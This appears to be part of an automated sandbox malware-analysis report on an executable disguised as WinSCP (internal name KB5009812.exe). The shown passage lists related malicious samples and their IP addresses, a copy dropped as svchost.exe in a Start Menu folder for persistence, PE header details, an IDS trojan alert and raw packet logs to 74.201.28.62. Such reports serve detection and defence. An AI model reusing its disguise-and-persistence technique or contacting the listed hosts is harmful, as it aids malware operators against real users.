          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          DEDIPATH-LLCUSlhV2xDUqUB.exeGet hashmaliciousBrowse
          • 45.9.20.52
          macosx.dllGet hashmaliciousBrowse
          • 45.15.131.126
          OG9rNsihJ7.exeGet hashmaliciousBrowse
          • 74.201.28.62
          ECD2MpEBSf.exeGet hashmaliciousBrowse
          • 74.201.28.62
          ZA3cYU28Yl.exeGet hashmaliciousBrowse
          • 74.201.28.62
          0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exeGet hashmaliciousBrowse
          • 45.144.225.57
          kGl1qp3Ox8.exeGet hashmaliciousBrowse
          • 45.144.225.57
          yHcz4Mey3x.exeGet hashmaliciousBrowse
          • 45.9.20.52
          177c65f9d487ab127f498df9f0c1c6cb546901fcbb7b3.exeGet hashmaliciousBrowse
          • 45.9.20.141
          jJMJsBJdLa.exeGet hashmaliciousBrowse
          • 45.128.51.66
          6E52D162BAF265E070EC1A3147AD651D8BD8481D96B33.exeGet hashmaliciousBrowse
          • 45.144.225.57
          TwUQy6g4z3.exeGet hashmaliciousBrowse
          • 45.9.20.101
          149_setupInstaller.exeGet hashmaliciousBrowse
          • 45.144.225.57
          56c6e786a980422a6dc322c54dee750a936f4f143d268.exeGet hashmaliciousBrowse
          • 45.9.20.101
          BombCrypto Bot.exeGet hashmaliciousBrowse
          • 45.9.20.52
          767C546DECF6F669263E4A0A87A0F5D92234E031E9A0D.exeGet hashmaliciousBrowse
          • 45.144.225.57
          TOE4MNi3hs.exeGet hashmaliciousBrowse
          • 45.9.20.144
          biXCm8fuHg.exeGet hashmaliciousBrowse
          • 45.9.20.91
          3A6CA6A75525505890DC5D13AB3D888135B1CB4922605.exeGet hashmaliciousBrowse
          • 45.144.225.57
          00B5C410D204D6A92F6636E23998777D2716E8928F96B.exeGet hashmaliciousBrowse
          • 45.144.225.57

          JA3 Fingerprints

          No context

          Dropped Files

          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\svchost.exeOG9rNsihJ7.exeGet hashmaliciousBrowse
            ECD2MpEBSf.exeGet hashmaliciousBrowse
              ZA3cYU28Yl.exeGet hashmaliciousBrowse

                Created / dropped Files

                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\svchost.exe
                Process:C:\Users\user\Desktop\45I8GbQlUj.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):54272
                Entropy (8bit):4.125149292696976
                Encrypted:false
                SSDEEP:192:s7yxMfjf6NrLqKZ6mXS9LzL1pvULIRPqY2F3991ZuBhyY8PGCz9QwAOSZCGQyBbf:KyufjSLq86mXS9LzLdqY2LHZ4cZA
                MD5:1B1E4286625BB189A526E910F2031C7B
                SHA1:650C0550F12C65D9841D10AB589FF39261018957
                SHA-256:C9D7CB68DEC80469C3C03B0E90C7AF1972462CA7779424DB3BFD9D44AEBAA624
                SHA-512:68F2366606B658FDDB2B5E9BAE2E6931FB455A230F8A4813EACB38A3D7853B9640F46FE9EE6FFD9862A509558B66C30A3494CB7231C3EF7CD784950771273155
                Malicious:true
                Antivirus:
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: Virustotal, Detection: 25%, Browse
                • Antivirus: ReversingLabs, Detection: 21%
                Joe Sandbox View:
                • Filename: OG9rNsihJ7.exe, Detection: malicious, Browse
                • Filename: ECD2MpEBSf.exe, Detection: malicious, Browse
                • Filename: ZA3cYU28Yl.exe, Detection: malicious, Browse
                Reputation:low
                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....vL..........."...0..............5... ...@....@.. ....................... ............@..................................4..O....@..\............................4............................................... ............... ..H............text........ ...................... ..`.rsrc...\....@......................@..@.reloc..............................@..B.................4......H........#..`............3...............................................0..:........(.......(....(.....s......o.....(.......(....(.......+..*".(.....*..0............ ...(....r...p......%.."...(.....(...........%. N..."....o....&. ....(........&.....&...(....r...pr5..pr9..p(..........%..'...(.....(....s..........%.r;..p.o....t.....+..*........B..Q.......0..7.........(.............,.....i(.....(.....o....&s .....(....o!...o"....s#......o$.....+...(%.........o&...o'.......((..
                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\svchost.exe:Zone.Identifier
                Process:C:\Users\user\Desktop\45I8GbQlUj.exe
                File Type:ASCII text, with CRLF line terminators
                Category:modified
                Size (bytes):26
                Entropy (8bit):3.95006375643621
                Encrypted:false
                SSDEEP:3:ggPYV:rPYV
                MD5:187F488E27DB4AF347237FE461A079AD
                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                Malicious:true
                Reputation:high, very likely benign file
                Preview: [ZoneTransfer]....ZoneId=0

                Static File Info

                General

                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Entropy (8bit):4.125149292696976
                TrID:
                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                • Win32 Executable (generic) a (10002005/4) 49.78%
                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                • Generic Win/DOS Executable (2004/3) 0.01%
                • DOS Executable Generic (2002/1) 0.01%
                File name:45I8GbQlUj.exe
                File size:54272
                MD5:1b1e4286625bb189a526e910f2031c7b
                SHA1:650c0550f12c65d9841d10ab589ff39261018957
                SHA256:c9d7cb68dec80469c3c03b0e90c7af1972462ca7779424db3bfd9d44aebaa624
                SHA512:68f2366606b658fddb2b5e9bae2e6931fb455a230f8a4813eacb38a3d7853b9640f46fe9ee6ffd9862a509558b66c30a3494cb7231c3ef7cd784950771273155
                SSDEEP:192:s7yxMfjf6NrLqKZ6mXS9LzL1pvULIRPqY2F3991ZuBhyY8PGCz9QwAOSZCGQyBbf:KyufjSLq86mXS9LzLdqY2LHZ4cZA
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....vL..........."...0..............5... ...@....@.. ....................... ............@................................

                File Icon

                Icon Hash:00928e8e868eb000

                Static PE Info

                General

                Entrypoint:0x403512
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                Time Stamp:0x964C769C [Sat Nov 27 02:38:20 2049 UTC]
                TLS Callbacks:
                CLR (.Net) Version:v4.0.30319
                OS Version Major:4
                OS Version Minor:0
                File Version Major:4
                File Version Minor:0
                Subsystem Version Major:4
                Subsystem Version Minor:0
                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                Entrypoint Preview

                Instruction
                jmp dword ptr [00402000h]
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al

                Data Directories

                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0x34c00x4f.text
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000xb95c.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x100000xc.reloc
                IMAGE_DIRECTORY_ENTRY_DEBUG0x34a40x1c.text
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                Sections

                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x20000x15180x1600False0.545632102273data5.4073053016IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                .rsrc0x40000xb95c0xba00False0.0978032594086data3.78149617358IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .reloc0x100000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                Resources

                NameRVASizeTypeLanguageCountry
                RT_ICON0x41e00x8dbPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                RT_ICON0x4acc0x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 4294967295
                RT_ICON0x8d040x25a8data
                RT_ICON0xb2bc0x1a68data
                RT_ICON0xcd340x10a8data
                RT_ICON0xddec0x988data
                RT_ICON0xe7840x6b8data
                RT_ICON0xee4c0x468GLS_BINARY_LSB_FIRST
                RT_GROUP_ICON0xf2c40x76data
                RT_VERSION0xf34c0x40edata
                RT_MANIFEST0xf76c0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                Imports

                DLLImport
                mscoree.dll_CorExeMain

                Version Infos

                DescriptionData
                Translation0x0000 0x04b0
                LegalCopyright(c) 2000-2021 Martin Prikryl
                Assembly Version5.19.2.11614
                InternalNameKB5009812.exe
                FileVersion5.19.2.11614
                CompanyNameMartin Prikryl
                LegalTrademarks
                CommentsWinSCP: SFTP, FTP, WebDAV, S3 and SCP client
                ProductNameWinSCP
                ProductVersion5.19.2.11614
                FileDescriptionWinSCP: SFTP, FTP, WebDAV, S3 and SCP client
                OriginalFilenameKB5009812.exe

                Network Behavior

                Snort IDS Alerts

                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                01/15/22-01:14:06.276603TCP2034631ET TROJAN Maldoc Activity (set)4976080192.168.2.474.201.28.62

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Jan 15, 2022 01:14:06.172054052 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.273446083 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.273605108 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.276602983 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.379652977 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.379785061 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.379858017 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.379894972 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.379923105 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.379991055 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.379996061 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.380064011 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.380121946 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.380125999 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.380198956 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.380254030 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.380259037 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.380323887 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.380381107 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.480017900 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.480077982 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.480098963 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.480135918 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.480155945 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.480178118 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.480199099 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.480220079 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.480238914 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.480257988 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.480278015 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.480284929 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.480284929 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.480308056 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.480331898 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.480340958 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.480357885 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.480386019 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.480389118 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.480412960 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.480436087 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.480448961 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.480458021 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.480482101 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.480494022 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.480504990 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.480528116 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.480532885 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.480575085 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.578672886 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.578723907 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.578763008 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.578788996 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.578802109 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.578844070 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.578857899 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.578883886 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.578922033 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.578928947 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.578963041 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.578999996 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.579011917 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.579039097 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.579077005 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.579091072 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.579117060 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.579155922 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.579164982 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.579194069 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.579232931 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.579241991 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.579272032 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.579308987 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.579317093 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.579348087 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.579385996 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.579394102 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.579425097 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.579464912 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.579472065 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.579502106 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.579540968 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.579546928 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.579581022 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.579619884 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.579628944 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.579658985 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.579696894 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.579709053 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.579736948 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.579777002 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.579787970 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.579814911 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.579854012 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.579866886 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.579891920 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.579929113 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.579941988 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.579967976 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.580004930 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.580018044 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.580044031 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.580084085 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.580100060 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.580120087 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.580159903 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.580198050 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.580252886 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.580281973 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.678574085 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.678642035 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.678672075 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.678702116 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.678740025 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.678776026 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.678809881 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.678847075 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.678885937 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.678921938 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.678921938 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.678951979 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.678961992 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.678978920 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.678999901 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.679035902 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.679074049 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.679075956 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.679111004 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.679145098 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.679147959 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.679186106 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.679202080 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.679222107 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.679269075 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.679281950 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.679308891 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.679342031 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.679378033 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.679384947 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.679414988 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.679450035 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.679450989 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.679486990 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.679502010 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.679523945 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.679559946 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.679594040 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.679595947 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.679634094 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.679670095 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.679671049 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.679708004 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.679733038 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.679744005 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.679784060 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.679801941 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.679819107 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.679856062 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.679874897 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.679893970 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.679930925 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.679951906 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.679968119 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.680003881 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.680025101 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.680038929 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.680074930 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.680109978 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.680114031 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.680145979 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.680181980 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.680182934 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.680219889 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.680244923 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.680255890 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.680294991 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.680327892 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.680334091 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.680387020 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.778786898 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.778816938 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.778836966 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.778857946 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.778882027 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.778903008 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.778924942 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.778934956 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.778948069 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.778950930 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.778970003 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.778991938 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.778992891 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.779016018 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.779037952 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.779040098 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.779059887 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.779081106 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.779081106 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.779103041 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.779124022 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.779124975 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.779149055 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.779171944 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.779180050 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.779196024 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.779213905 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.779218912 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.779242992 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.779264927 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.779272079 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:06.779288054 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:06.779310942 CET804976074.201.28.62192.168.2.4
